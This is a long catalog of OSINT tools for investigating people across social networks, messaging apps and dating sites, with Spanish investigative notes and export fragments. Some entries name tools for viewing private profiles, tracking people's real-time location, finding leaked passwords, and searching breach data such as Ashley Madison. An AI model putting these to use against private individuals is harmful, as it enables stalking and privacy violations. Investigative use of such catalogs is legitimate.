Find Instagram User Id - Link: Find Instagram User Id - Description: This tool called "Find Instagram User ID" provides an easy way for developers and designers to get Instagram account numeric ID by username.
Instahunt - Link: Instahunt - Description: Easily find social media posts surrounding a location.
InstaFreeView - Link: InstaFreeView - Description: InstaFreeView Private Instagram Profile Viewer is a free app to view Instagram profile posts without login.
InstaNavigation - Link: instanavigation - Description: Anonymous story viewing on Instagram.
TikTok-scraper-dl - Link: TikTok-scraper-dl - Description: .
Musicaldown - Link: Musicaldown - Description: web.
RecruitEm - Link: RecruitEm - Description: Allows you to search social media profiles. It helps recruiters to create a Google boolean string that searches all public profiles.
RocketReach - Link: RocketReach - Description: Allows you to programmatically search and lookup contact info over 700 million professionals and 35 million companies.
Phantom Buster - Link: Phantom Buster - Description: Automation tool suite that includes data extraction capabilities.
linkedprospect - Link: LinkedIn Boolean Search - Description: Build a targeted list of LinkedIn people using boolean search.
ReverseContact - Link: Reverse Email Lookup - Description: Find Linked Profiles associated with any email.
LinkedIn Search Engine - Link: Programmable Search Engine - Description: Programmable Search Engine for LinkedIn profiles.
Free People Search Tool - Link: Free People Search Tool - Description: Find people easily online.
IntelligenceX Linkedin - Link: IntelligenceX Linkedin - Description: A webbased tool for searching someone on Linkedin.
Linkedin Search Tool - Link: Linkedin Search Tool - Description: Provides you a interface with various tools for Linkedin Osint.
LinkedInt - Link: LinkedInt - Description: Providing you with Linkedin Intelligence.
InSpy - Link: InSpy - Description: InSpy is a python based LinkedIn enumeration tool.
CrossLinked - Link: CrossLinked - Description: CrossLinked is a LinkedIn enumeration tool that uses search engine scraping to collect valid employee names from an organization.
TweetDeck - Link: TweetDeck - Description: Offers a more convenient Twitter experience by allowing you to view multiple timelines in one easy interface.
FollowerWonk - Link: FollowerWonk - Description: Helps you find Twitter accounts using bio and provides many other useful features.
Twitter Advanced Search - Link: Twitter Advanced Search - Description: Allows you to search on Twitter using filters for better search results.
Wayback Tweets - Link: Wayback Tweets - Description: Display multiple archived tweets on Wayback Machine and avoid opening each link manually.
memory.lol - Link: memory.lol - Description: a tiny web service that provides historical information about twitter users.
SocialData API - Link: SocialData API - Description: an unofficial Twitter API alternative that allows scraping historical tweets, user profiles, lists and Twitter spaces without using Twitter's API.
Social Bearing - Link: Social Bearing - Description: Insights & analytics for tweets & timelines.
Tinfoleak - Link: Tinfoleak - Description: Search for Twitter users leaks.
Network Tool - Link: Network Tool - Description: Explore how information spreads across Twitter with an interactive network using OSoMe data.
Foller - Link: Foller - Description: Looking for someone in the United States? Our free people search engine finds social media profiles, public records, and more!
SimpleScraper OSINT - Link: SimpleScraper OSINT - Description: This Airtable automatically scrapes OSINT-related twitter accounts ever 3 minutes and saves tweets that contain coordinates.
Deleted Tweet Finder - Link: Deleted Tweet Finder - Description: Search for deleted tweets across multiple archival services.
Twitter Search Tool - Link: Twitter search tool - Description: On this page you can create advanced search queries within Twitter.
Twitter Video Downloader - Link: Twitter Video Downloader - Description: Download Twitter videos & GIFs from tweets.
Download Twitter Data - Link: Download Twitter Data - Description: Download Twitter data in csv format by entering any Twitter handle, keyword, hashtag, List ID or Space ID.
Twitonomy - Link: Twitonomy - Description: Twitter #analytics and much more.
tweeterid - Link: tweeterid - Description: Type in any Twitter ID or @handle below, and it will be converted into the respective ID or username.
BirdHunt - Link: BirdHunt - Description: Easily find social media posts surrounding a location.
DownAlbum - Link: DownAlbum - Description: Google Chrome extension for downloading albums of photos from various websites, including Pinterest.
Experts PHP: Pinterest Photo Downloader - Link: Pinterest Photo Downloader - Description: Website providing a tool to download photos from Pinterest.
Pingroupie - Link: Pingroupie - Description: A Meta Search Engine for Pinterest that lets you discover Collaborative Boards, Influencers, Pins, and new Keywords.
Tailwind - Link: Tailwind - Description: Social media scheduling and management tool that supports Pinterest.
Pinterest Guest - Link: Pinterest Guest - Description: Mozilla Firefox add-on for browsing Pinterest without logging in or creating an account.
SourcingLab: Pinterest - Link: SourcingLab: Pinterest - Description: Pinterest search feature for finding pins, boards, and users.
F5BOT - Link: F5BOT - Description: Receive notifications for new Reddit posts matching specific keywords.
Karma Decay - Link: Karma Decay - Description: Reverse image search for finding similar or reposted images on Reddit.
Mostly Harmless - Link: Mostly Harmless - Description: A suite of tools for Reddit, including user analysis, subreddit comparison, and more.
OSINT Combine: Reddit Post Analyzer - Link: OSINT Combine: Reddit Post Analyzer - Description: Analyze and gather information from Reddit posts for OSINT purposes.
Phantom Buster - Link: Phantom Buster - Description: Automation tool suite that includes Reddit data extraction capabilities.
rdddeck - Link: rdddeck - Description: Real-time dashboard for monitoring multiple Reddit communities.
Readr for Reddit - Link: Readr for Reddit - Description: Google Chrome extension for an improved reading experience on Reddit.
Reddit Archive - Link: Reddit Archive - Description: Archive of Reddit posts and comments for historical reference.
Reddit Comment Search - Link: Reddit Comment Search - Description: Search for specific comments and conversations on Reddit.
Redditery - Link: Redditery - Description: Explore Reddit posts and comments based on various criteria.
Reddit Hacks - Link: Reddit Hacks - Description: Collection of Reddit hacks and tricks for advanced users.
Reddit List - Link: Reddit List - Description: Directory of popular subreddits organized by various categories.
reddtip - Link: reddtip - Description: Show appreciation to Reddit users by sending them tips in cryptocurrencies.
Reddit Search - Link: Reddit Search (realsrikar) - Description: Various tools and websites for searching and discovering content on Reddit.
Reddit Shell - Link: Reddit Shell - Description: Command-line interface for browsing and interacting with Reddit.
Reddit Stream - Link: Reddit Stream - Description: Live-streaming of Reddit comments for real-time discussions.
Reddit Suite - Link: Reddit Enhancement Suite (Chrome Extension) - Description: Browser extension that enhances the Reddit browsing experience with additional features.
Reddit User Analyser - Link: Reddit User Analyser - Description: Analyze and visualize the activity and behavior of Reddit users.
redditvids - Link: redditvids - Description: Watch Reddit videos and browse popular video subreddits.
Redective - Link: Redective - Description: Investigate and analyze Reddit users based on their post history.
Reditr - Link: Reditr - Description: Desktop Reddit client with a clean and intuitive interface.
Reeddit - Link: Reeddit - Description: Simplified and clean Reddit web interface for a distraction-free browsing experience.
ReSavr - Link: ReSavr - Description: Retrieve and save deleted Reddit comments for later viewing.
smat - Link: smat - Description: Social media analytics tool that includes Reddit for tracking trends and engagement.
socid_extractor - Link: socid_extractor - Description: Extract user information from Reddit and other social media platforms.
Suggest me a subreddit - Link: Suggest me a subreddit - Description: Get recommendations for new subreddits to explore based on your preferences.
Subreddits - Link: Subreddits - Description: Directory of active subreddits organized by various categories.
uforio - Link: uforio - Description: Generate word clouds from Reddit comment threads.
Universal Reddit Scraper (URS) - Link: Universal Reddit Scraper (URS) - Description: Python-based tool for scraping Reddit data for analysis.
Vizit - Link: Vizit - Description: Visualize and analyze relationships between Reddit users and subreddits.
Wisdom of Reddit - Link: Wisdom of Reddit - Description: Curated collection of insightful quotes and comments from Reddit.
Awesome Lists - Link: Awesome Lists - Description: A curated list of awesome lists for various programming languages, frameworks, and tools.
CoderStats - Link: CoderStats - Description: A platform for developers to track and showcase their coding activity and statistics from GitHub.
Commit-stream - Link: Commit-stream - Description: A tool for monitoring and collecting GitHub commits in real-time.
Digital Privacy - Link: Digital Privacy - Description: A collection of resources and tools for enhancing digital privacy and security.
Find Github User ID - Link: Find Github User ID - Description: A web tool for finding the unique identifier (ID) of a GitHub user.
GH Archive - Link: GH Archive - Description: A project that provides a public dataset of GitHub activity, including events and metadata.
Git-Awards - Link: Git-Awards - Description: A website that ranks GitHub users and repositories based on their contributions and popularity.
GitGot - Link: GitGot - Description: A semi-automated, feedback-driven tool for auditing Git repositories.
gitGraber - Link: gitGraber - Description: A tool for searching and cloning sensitive information in GitHub repositories.
git-hound - Link: git-hound - Description: A tool for finding sensitive information exposed in GitHub repositories.
Github Dorks - Link: Github Dorks - Description: A collection of GitHub dorks, which are search queries to find sensitive information in repositories.
Github Stars - Link: Github Stars - Description: A website that showcases GitHub repositories with the most stars and popularity.
Github Trending RSS - Link: Github Trending RSS - Description: An RSS feed generator for trending repositories on GitHub.
Github Username Search Engine - Link: Github Username Search Engine - Description: A search engine to find GitHub usernames based on various filters and criteria.
Github Username Search Engine - Link: Github Username Search Engine - Description: Another search engine to find GitHub usernames with advanced filtering options.
GitHut - Link: GitHut - Description: A website that provides statistics and visualizations of programming languages on GitHub.
addmeContacts - Link: addmeContacts - Description: A platform to find and connect with new contacts on various social media platforms.
AddMeSnaps - Link: AddMeSnaps - Description: A website for discovering and adding new Snapchat friends.
ChatToday - Link: ChatToday - Description: An online chat platform for connecting and chatting with people from around the world.
Gebruikersnamen: Snapchat - Link: Gebruikersnamen: Snapchat - Description: A website for finding Snapchat usernames.
GhostCodes - Link: GhostCodes - Description: An app for discovering new Snapchat users and their stories.
OSINT Combine: Snapchat MultiViewer - Link: OSINT Combine: Snapchat MultiViewer - Description: A tool for viewing multiple Snapchat accounts simultaneously.
Snap Map - Link: Snap Map - Description: Snapchat's feature that allows users to share their location and view Snaps from around the world.
Snapchat-mapscraper - Link: Snapchat-mapscraper - Description: A tool for scraping public Snapchat Stories from the Snap Map.
Snap Political Ads Library - Link: Snap Political Ads Library - Description: Snapchat's library of political ads displayed on the platform.
Social Finder - Link: Social Finder - Description: A platform to search and discover social media profiles on various platforms.
SnapIntel - Link: SnapIntel - Description: a python tool providing you information about Snapchat users.
AddMeS - Link: AddMeS - Description: The 'Add Me' directory of Snapchat users on web.
checkwa - Link: checkwa - Description: An online tool to check the status and availability of WhatsApp numbers.
WhatsApp Fake Chat - Link: WhatsApp Fake Chat - Description: An online tool to generate fake WhatsApp conversations for fun or pranks.
Whatsapp Monitor - Link: Whatsapp Monitor - Description: A tool for monitoring and analyzing WhatsApp messages and activities.
whatsfoto - Link: whatsfoto - Description: A Python script to download profile pictures from WhatsApp contacts.
addmeContacts - Link: addmeContacts - Description: A platform to find and connect with new contacts on various social media platforms.
ChatToday - Link: ChatToday - Description: An online chat platform for connecting and chatting with people from around the world.
Skypli - Link: Skypli - Description: A website for discovering and connecting with new Skype contacts.
ChatBottle: Telegram - Link: ChatBottle: Telegram - Description: A directory of Telegram bots for various purposes.
ChatToday - Link: ChatToday - Description: An online chat platform for connecting and chatting with people from around the world.
informer - Link: informer - Description: A Python library for retrieving information about Telegram channels, groups, and users.
_IntelligenceX: Telegram - Link: _IntelligenceX: Telegram - Description: IntelligenceX's Telegram tool for searching and analyzing Telegram data.
Lyzem.com - Link: Lyzem.com - Description: A website to search and find Telegram groups and channels.
Telegram Channels - Link: Telegram Channels - Description: A directory of Telegram channels covering various topics.
Telegram Channels - Link: Telegram Channels - Description: A platform to discover and browse Telegram channels.
Telegram Channels Search - Link: Telegram Channels Search - Description: A search engine to find Telegram channels by keywords.
Telegram Directory - Link: Telegram Directory - Description: A comprehensive directory of Telegram channels, groups, and bots.
Telegram Group - Link: Telegram Group - Description: A website to search and join Telegram groups.
telegram-history-dump - Link: telegram-history-dump - Description: A Python script to dump the history of a Telegram chat into a SQLite database.
Telegram-osint-lib - Link: Telegram-osint-lib - Description: A Python library for performing open-source intelligence (OSINT) on Telegram.
Telegram Scraper - Link: Telegram Scraper - Description: A powerful Telegram scraping tool for extracting user information and media.
Tgram.io - Link: Tgram.io - Description: A platform to explore and search for Telegram channels, groups, and bots.
Tgstat.com - Link: Tgstat.com - Description: A comprehensive platform for analyzing and tracking Telegram channels and groups.
Tgstat RU - Link: Tgstat RU - Description: A Russian platform for analyzing and monitoring Telegram channels and groups.
DiscordOSINT - Link: DiscordOSINT - Description: This Repository Will contain useful resources to conduct research on Discord.
Discord.name - Link: Discord.name - Description: Discord profile lookup using user ID.
Lookupguru - Link: Lookupguru - Description: Discord profile lookup using user ID.
Discord History Tracker - Link: Discord History Tracker - Description: Discord History Tracker lets you save chat history in your servers, groups, and private conversations, and view it offline.
Top.gg - Link: Top.gg - Description: Explore millions of Discord Bots.
Unofficial Discord Lookup - Link: Unofficial Discord Lookup - Description: Search for discord profile using id.
Disboard - Link: Disboard - Description: DISBOARD is the place where you can list/find Discord servers.
OnlyFans Finder - Link: The Favourite OnlyFans search - Description: The tools allow easy searching via advanced filtering capabilities and sorting functionality, making it easy to access desired material.
OnlyFam - Link: OnlyFam - Description: OnlyFans Search & Model Finder - Find Creators in the World's Largest OnlyFans Database
OnlyFinder - Link: OnlyFinder - Description: OnlyFans Search Engine - OnlyFans Account Finder.
OnlySearch - Link: OnlySearch - Description: Find OnlyFans profiles by searching for key words.
Sotugas - Link: SóTugas - Description: Encontra Contas do OnlyFans Portugal 🇵🇹.
Fansmetrics - Link: Fansmetrics - Description: Use this OnlyFans Finder to search in 3,000,000 OnlyFans Accounts.
Findr.fans - Link: Findr.fans - Description: Only Fans Search Tool.
Hubite - Link: Hubite - Description: Advanced OnlyFans Search Engine.
Similarfans - Link: Similarfans - Description: Blog for OnlyFans content creators.
Fansearch - Link: Fansearch - Description: Fansearch is the best OnlyFans Finder to search in 3,000,000 OnlyFans Accounts.
Fulldp - Link: Fulldp - Description: Download Onlyfans Full-Size Profile Pictures.
Mavekite - Link: Mavekite - Description: Search the profile using username.
TikTok hashtag analysis toolset - Link: TikTok hashtag analysis toolset - Description: The tool helps to download posts and videos from TikTok for a given set of hashtags over a period of time.
TikTok Video Downloader - Link: TikTok Video Downloader - Description: ssstiktok is a free TikTok video downloader without watermark tool that helps you download TikTok videos without watermark (Musically) online.
Exolyt - Link: exolyt - Description: The best tool for TikTok analytics & insights.
tema-socmint-completo ]]>projects/socmint/major-social-networks.htmlProjects/socmint/major-social-networks.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Audiense - Tool to identify relevant audience, discover actionable insights and inform strategies to grow your business.
Bottlenose
Brandwatch
Buffer
Buzz sumo - "Use our content insights to generate ideas, create high-performing content, monitor your performance and identify influencers."
Castrick - Find social media accounts with email, username and phone number
Epieos - Search for social accounts with e-mail and phone
Geocreepy
Hootsuite
IDCrawl - Search for a name in popular social networks.
Klear
Kribrum
Mail.Ru Social Network Search
MustBePresent
Netvibes
Oblivion
OpinionCrawl
Predicta Search - Search for social accounts with e-mail and phone
Rival IQ
Social DownORNot
Social Searcher
SocialBakers
SocialBlade
Tagboard
UVRX
WATools
tema-socmint-completo ]]>projects/socmint/real-time-social-search.htmlProjects/socmint/real-time-social-search.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
ExportData - Data export tool for historical tweets, followers & followings and historical trends.
Foller.me
MyTweetAlerts - A tool to create custom email alerts based on Twitter search.
OneMillionTweetMap
RiteTag
Sentiment140
Tagdef
Trends24
TwChat
TweetMap
TweetMap
Twitter Advanced Search
Twitter Audit
Twitter Chat Schedule
Twitter Search
Xquik - Real-time X (Twitter) data platform for tweet search, user lookup, follower/following extraction, engagement metrics, account monitoring, reply/retweet/quote extraction, community & Space data, and mutual follow checks.
Facebook Friend List Scraper - Tool for scraping large Facebook friend lists without being rate-limited.
Facebook Search
Fanpage Karma
Fb-sleep-stats - Use Facebook to track your friends’ sleeping habits.
Find my Facebook ID - To find your Facebook personal numeric ID for facebook graph API operations, fb:admins, social plugins.
haveibeenzuckered - A large dataset containing 533 million Facebook accounts was made available for download. The data was obtained by exploiting a vulnerability that was, according to Facebook, corrected in August 2019. Check if a telephone number is present within the Facebook data breach.
Lookup-ID.com - Looking for your Facebook profile ID / Group ID / Page ID.
SearchIsBack
Wolfram Alpha Facebook Report
Dolphin Radar - An Instagram Post Viewer lets you view posts, stories, and profiles from public accounts with ease. Free viewer limit: 1.
Iconosquare
instagram_monitor - Tool for real-time tracking of Instagram users' activities and profile changes with support for email alerts, CSV logging, showing media in the terminal, anonymous story downloads and more
InstagramPrivSniffer - Views Instagram PRIVATE ACCOUNT'S media without login 😱.
Osintgram - Osintgram offers an interactive shell to perform analysis on Instagram account of any users by its nickname.
Osintgraph - Tool that maps your target’s Instagram data and relationships in Neo4j for social network analysis.
Toutatis - a tool that allows you to extract information from instagrams accounts such as s, phone numbers and more
Pingroupie
Pinterest Pin Stats - Display hidden Pinterest stats for each pin. Tools to help discover more about a reddit user or subreddit.
Arctic Shift - A tool for accessing and interacting with large dumps of Reddit data, offering an API and web interface for research and moderation purposes.
Imgur - The most popular image hosting website used by redditors.
Mostly Harmless - Mostly Harmless looks up the page you are currently viewing to see if it has been submitted to reddit.
Pushshift API - A powerful API that provides access to historical Reddit data, including posts, comments, and metadata for analysis and research—more information here.
Pullpush - PullPush is a service for the indexing and retrieval of content that Reddit users have submitted to Reddit. Helpful for finding deleted/removed posts & comments.
REDARCS - Reddit archives 2005-2023.
Reddit Archive - Historical archives of reddit posts.
Reddit Suite - Enhances your reddit experience.
Reddit User Analyser - reddit user account analyzer.
RedditMetis - RedditMetis is a Reddit user analysis tool to see the summary and statistics for a Reddit account, including top posts and user activity etc.
Subreddits - Discover new subreddits.
Reddit Comment Search - Analyze a reddit users by comment history.
Universal Scammer List - This acts as the website-portion for the subreddit /r/universalscammerlist. That subreddit, in conjuction with this website and a reddit bot, manages a list of malicious reddit accounts and minimizes the damage they can deal. This list is referred to as the "USL" for short.
Reddit Comment Lookup - Search for reddit comments by reddit username. Perform various OSINT on Russian social media site VKontakte.
Дезертир
Barkov.net
VK5
VK Community Search
VK People Search
VK.watch
2Chat - Check if a number is on WhatsApp.
Groupio - Find and search WhatsApp groups.
*Whatsapp CheckLeaked - WhatsApp Number Search & Profile Photo Checker. API Option Available.
Tumblr Search
the-endorser - Tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills.
LinkedInDumper - Script to dump/scrape/extract company employees info from LinkedIn API.
CCTV - Close-Circuit Telegram Vision revolutionizes location tracking with its open-source design and Telegram API integration. Offering precise tracking within 50-100 meters, users can monitor others in real-time for logistics or safety, redefining how we navigate our surroundings.
GroupDa - Can be used for Searching Telegram Channels. Search by Category, Countries and Language.
Maltego Telegram - Rich Set of Entities & Transforms for OSINT on Telegram with Maltego.
Telegram Finder - A tool to find Telegram users by their phone number, linkedin url or email.
Telerecon - A reconnaissance framework for researching and investigating Telegram.
TgramSearch - Convenient search for Telegram channels, as well as a structured catalog with over 700000 Telegram channels. Available in 8+ Languages.
tgworld - The Global Search System TG.World will help you find Channels, Groups and Bots in Telegram in any language and for any country in the world!
Telegram Channel Joiner - grow your Free and Premium Telegram accounts easily with this channel joiner script.
Telepahty - Telepathy is a tool that archives Telegram chats and analyzes communication patterns within the app. By providing insights into user interactions, message frequency, and content trends, Telepathy helps investigators understand the dynamics and relationships within Telegram groups and channels.
Teleteg - The ultimate Telegram search engine. 10 results for free plan.
Telegago - A Google Advanced Search specifically for finding public and private Telegram Channels and Chatrooms.
Telegram Nearby Map - Webapp based on OpenStreetMap and the official Telegram library to find the position of nearby users.
Telegram channels scraper TeleGraphite - Telegram Scraper & JSON Exporter & telegram channels scraper.
TeleSearch - Search and find your desired Telegram channels, groups, bots and games quickly and easily with Telesearch​.
TeleTracker - TeleTracker is a simple set of Python scripts designed for anyone investigating Telegram channels. It helps you send messages quickly and gather useful channel information easily.
TOsint - Tosint (Telegram OSINT) is a powerful tool designed to extract valuable information from Telegram bots and channels. It serves as an essential resource for security researchers, investigators, and anyone interested in gathering insights from various Telegram entities. Telegram Bots
AgentFNS_Bot — Free instant counterparty check using official data (INN/OGRN).
AVinfoBot — Used-car history via plate/VIN/phone.
AvtoNomer — Finds vehicle photos by plate via platesmania.com.
avtogram_bot — Paid car reports (VIN/plate): accidents, fines, liens.
avtocodbot — Paid VIN/plate lookup.
bmi_np_bot — Identifies phone-number operator and basic info.
ChatSearchRobot — Finds chats with similar topics; 709k+ VK chats.
ClerkBot — Phone + username lookup; vehicle info.
creationdatebot — Approx. Telegram account creation date.
CryptoBot — Anonymous crypto wallet.
datXpert — Leak search via IntelX.
Detectiva — Phone/email lookup with 6 search types.
Discord Sensor — Retrieves Discord account data.
dCallsBot — Anonymous calls, masking, eSIM/DID.
EasyVIN — Cheap VIN/plate history check.
egrul_bot — Free counterparty-check bot.
EyeTON — TON wallet graph + linked profiles.
FindStickerCreator — Finds creator of any Telegram sticker pack.
Фари — VIN-history lookup from getcar.by.
GeoMacFinder — Finds Wi-Fi AP location by MAC/BSSID.
getChatList — Shows user’s group list.
Getairplane — Phone → flight history (20 years).
GetSendGifts — Shows who sent Telegram gifts.
HimeraSearch — OSINT/HUMINT search: phones, emails, vehicles, people, courts.
Insight — Shows interests based on subscriptions.
InstaAnonym — Anonymous Instagram/VK viewer.
InstaBot — Downloads Instagram media.
ITP Infotrack — People, vehicle, property lookup.
Leak OSINT — Phone-number leakage check.
Maigret OSINT bot — Username search on 1,366 sites.
mnp_bot — Phone operator + region.
MotherSearchBot — Google-like Telegram search.
NEUROAUTOSEARCH — Car DB search + neural networks.
OkSearch — Search channels, bots, groups by keyword.
OpenDataUABot — Ukrainian OSINT bot.
OPENLOAD Bot — Semi-automated OSINT/vuln scanning suite.
Osintkit — Ukrainian lookup: passport, tax ID, email, phone, address, vehicles, Telegram.
PasswordSearch — Shows leaked passwords for an email.
PimEyes — Face-search across social networks.
RegDateBot — Registration date by ID/forward.
SangMata (beta) — Name-change history via /search_id.
SangMataInfo_bot — Username change history.
SaveYoutubeBot — Finds and downloads YouTube videos.
Search_firm_bot — Searches organizations, banks, postal codes.
Searchforchats — Searches chats by keywords.
Sherlock — Name/phone/email search + vehicle data.
ShtrafKZBot — Fines, taxes, penalties; traffic violations.
SMS Activate — Virtual numbers from 50+ countries.
SpyGGbot — TON balances, NFT owners, Fragment usernames.
Surftg_bot — Searches Telegram messages.
TuriBot — Resolves username from Telegram ID.
Unamer — Username ownership history.
username_to_id_bot — Returns user/chat/channel/bot ID.
UsInfoBot — Resolves username from ID (inline).
WhoisDomBot — Whois lookup for domains/IPs + dig/trace.
OSINT-Steam - An open-source tool that returns public information, such as friends list and possible locations, from Steam profiles.
Steam-OSINT - Open-source OSINT tool for accurate mutual friends analysis on Steam, supporting full friend lists.
github_monitor - Tool for real-time tracking of GitHub users' activities including profile and repository changes with support for email alerts, CSV logging, detection when a user blocks or unblocks you and more
GithubRecon - Lookup Github users by username or email and gather associated data.
Shotstars - An advanced tool for checking GitHub repositories, with star statistics, including fake star analysis and data visualization. Importado desde Inbox/Buscadores de Enlaces de Telegram.md durante consolidacion bulk. Herramientas especializadas en la busqueda y monitorizacion de canales, grupos y enlaces dentro de la plataforma Telegram. Esenciales para cibervigilancia y seguimiento de actividad en grupos underground.Redes sociales / Telegram / Buscadores especializados. Monitorizar canales underground y de threat actors en Telegram Buscar filtraciones de datos publicadas en canales de Telegram Descubrir grupos relacionados con actividad maliciosa
Parte del flujo de opsec-network-transport-security IntelX es la herramienta mas completa para busqueda historica en Telegram TGStat proporciona estadisticas detalladas de crecimiento y engagement
Herramienta clave dentro de social-media-tools y opsec-network-transport-security Importado desde Inbox/FACEBOOK.md durante consolidacion bulk. Catalogo de herramientas especializadas en investigacion OSINT dentro de la plataforma Facebook. Incluye buscadores de ID, herramientas de analisis de relaciones de amistad, busqueda de publicaciones por fecha y extraccion de datos.Redes sociales / Facebook / Investigacion OSINT. Identificar perfiles de Facebook mediante email o telefono Analizar relaciones de amistad y conexiones sociales Buscar publicaciones historicas por fecha especifica Extraer datos publicos de perfiles para investigaciones WhoPostedWhat es la herramienta mas util para busqueda temporal Graph Search fue limitado por Facebook pero las alternativas siguen funcionando
Ver social-media-tools para herramientas de la misma plataforma Meta
Ver people-investigations para herramientas generales de busqueda de personas Importado desde Inbox/INSTAGRAM.md durante consolidacion bulk. Catalogo de herramientas para investigacion OSINT en Instagram. Incluye buscadores de ID de usuario, visualizadores anonimos de stories, herramientas de analisis de perfiles, busqueda por geolocalizacion y descargadores de contenido.Redes sociales / Instagram / Investigacion OSINT. Obtener el ID numerico de un perfil para consultas API Ver stories de forma anonima durante investigaciones Buscar publicaciones geolocalizadas en una ubicacion especifica Descargar contenido como evidencia antes de que sea eliminado OSINT Combine Instagram Explorer permite busqueda por coordenadas Gramhir proporciona estadisticas detalladas de engagement
Ver social-media-tools para herramientas de la misma plataforma Meta
Ver social-media-tools para herramientas de la plataforma competidora Importado desde Inbox/LINKEDIN.md durante consolidacion bulk. Herramientas para investigacion OSINT en LinkedIn, enfocadas en busqueda X-Ray (buscar perfiles de LinkedIn via Google) y busqueda avanzada dentro de la plataforma.Redes sociales / LinkedIn / Investigacion corporativa. Buscar empleados de una organizacion objetivo Descubrir patrones de emails corporativos Identificar organigramas y estructuras internas
Complementar investigaciones de company-research RecruitEm genera queries de Google para buscar en LinkedIn sin necesidad de cuenta premium La busqueda X-Ray evita las limitaciones de busqueda de LinkedIn free
Ver company-research para mas recursos de investigacion corporativa
Ver email-investigation para busqueda de emails de empleados Importado desde Inbox/Listado de Canales y Grupos.md durante consolidacion bulk. Importado desde Inbox/SITIOS DE CITAS.md durante consolidacion bulk. Recursos para investigacion OSINT en plataformas de citas online. Permiten buscar perfiles, verificar datos filtrados y localizar usuarios en sitios de dating sin necesidad de registro.Redes de citas / Busqueda de perfiles / Filtraciones de datos de dating. Buscar perfiles de dating asociados a un objetivo de investigacion Verificar si un email aparece en la filtracion de Ashley Madison Localizar perfiles en Tinder por username
Complementar investigaciones de people-investigations con presencia en dating La filtracion de Ashley Madison (2015) sigue siendo util para correlacion historica Para Tinder, reemplazar @username en la URL con el username objetivo
Ver people-investigations para herramientas de busqueda de personas por nombre
Ver username-enumeration para correlacionar usernames entre plataformas Importado desde Inbox/TELEGRAM.md durante consolidacion bulk. Recursos para investigar usuarios, canales y grupos en Telegram. Incluye buscadores especializados, motor de busqueda personalizado de Google (Telegago) y bots de Telegram para obtencion de informacion.Investigacion en Telegram / Busqueda de canales / OSINT en mensajeria. Buscar canales y grupos de Telegram por tema Encontrar contenido especifico en Telegram via Google (Telegago) Obtener correos asociados a usuarios de Telegram Monitorizar canales de actores de amenazas Telegago usa Google CSE indexando contenido publico de Telegram
Ver social-media-tools para herramientas detalladas Los bots de Telegram pueden proporcionar informacion adicional sobre usuarios Telegram es plataforma clave para comunicaciones de actores de amenazas Importado desde Inbox/TIKTOK.md durante consolidacion bulk. Herramienta de OSINT Combine para busqueda rapida de perfiles y contenido en TikTok. Permite localizar usuarios y analizar su actividad en la plataforma.Investigacion en TikTok / Busqueda de perfiles / OSINT en redes sociales. Buscar perfiles de TikTok por nombre de usuario Analizar contenido publico de un usuario de TikTok Complementar investigaciones de redes sociales OSINT Combine ofrece herramientas gratuitas y de pago TikTok tiene API limitada para investigacion
Ver social-media-tools y social-media-tools para otras plataformas de video
Ver username-enumeration para correlacionar usernames entre plataformas Importado desde Inbox/TWITTER.md durante consolidacion bulk. Recurso integral de Twitter/X para CTI y OSINT: 20+ cuentas clave de threat intel (vxunderground, Cyberknow20, DFIRReport, Arkbird, Cryptolaemus), proveedores de inteligencia (CrowdStrike, Mandiant, Kaspersky, Group-IB, Flashpoint, Intel471, Recorded Future), CERTs y organismos públicos (INCIBE-CERT, CCN-CERT, CISA, CIRCL, ESPDEF-CERT), comunidades de investigación (Bellingcat, GINSEG, TEAM CYMRU, LAB52/S2 Grupo, CronUP) y 12+ herramientas de análisis de Twitter (Tinfoleak, TweetBeaver, Socialbearing, Foller.me, Twiangulate, Followerwonk).
Group IB
Kaspersky
KE-LA
Microsoft Security Intelligence
Red Canary
Unit 42
CrowdStrike
The Record - Recorded Future
Trend Micro
Mandiant
Flashpoint
Trellix
Intel471
CIRCL - CERT Louxembourg
CISA Cyber
Cybersecurity and Infrastructure Security Agency (CISA)
CERT SocieteGenerale
MCCE ESPDEF-CERT
INCIBE-CERT
CCN-CERT
Cib3rWall
SANS DFIR
Daily Dark Web
VX-Underground
MalwareHunterTeam
CyberKnown20
The DFIR Report
DarkTracer
Curated Intelligence
BushidoToken
Malware3Ninja
Ransomware Leaks
ThreatMon Ransomware Monitoring
ThreatMon
Darkfeed
cKure
Advintel
Bellingcat
TEAM CYMRU - S2 Threat Research Team
TEAM CYMRU
LAB52 - S2 Grupo
Security Art Work - S2 Grupo
GINSEG
CronUP CiberseguridadBusqueda Simple Busqueda avanzada Extraccion de informacion (JSON) mediante peticion/respuesta desde navegadorTwitter Search Tool - IntelTechniques
TweeterID - Twitter ID and username converter
Twiangulate: analyzing the connections between friends and followers
Foller.me Analytics for Twitter
Followerwonk. Compare and Analyze Twitter Users - Followerwonk
Socialbearing. Twitter Analytics for Tweets, Timelines & Twitter Maps | Social Bearing
Tinfoleak | Free dossier of a twitter user
TweetBeaver - Home of Really Useful Twitter Tools
All My Tweets - View all your tweets on one page.
Twitonomy: Twitter analytics and much more...
Recruitin. Buscador de usuarios en Twitter
Búsqueda avanzada de Twitter
Twitter Search Tool - IntelTechniques Importado desde Inbox/YOUTUBE.md durante consolidacion bulk. Herramientas para investigar canales y videos de YouTube. SocialBlade proporciona estadisticas detalladas de canales, y Citizen Evidence de Amnesty permite extraer metadatos de videos.Investigacion en YouTube / Analisis de canales / Metadatos de video. Analizar el crecimiento y estadisticas de un canal de YouTube Extraer metadatos de videos (fecha real de subida, miniatura, etc.) Verificar la autenticidad de videos virales Monitorizar canales de propaganda o desinformacion SocialBlade cubre multiples plataformas, no solo YouTube Citizen Evidence es especialmente util para verificacion periodistica
Ver social-media-tools e social-media-tools para otras plataformas de video Para descarga y preservacion de videos ver PRODUCTIVIDAD
tema-socmint-completo ]]>projects/socmint/social-media-tools.htmlProjects/socmint/social-media-tools.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Gephi - is an open-source graph and network visualization software.
ORA
Sentinel Visualizer
Visual Investigative Scenarios
Wynyard Group
tema-socmint-completo ]]>projects/socmint/social-network-analysis.htmlProjects/socmint/social-network-analysis.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
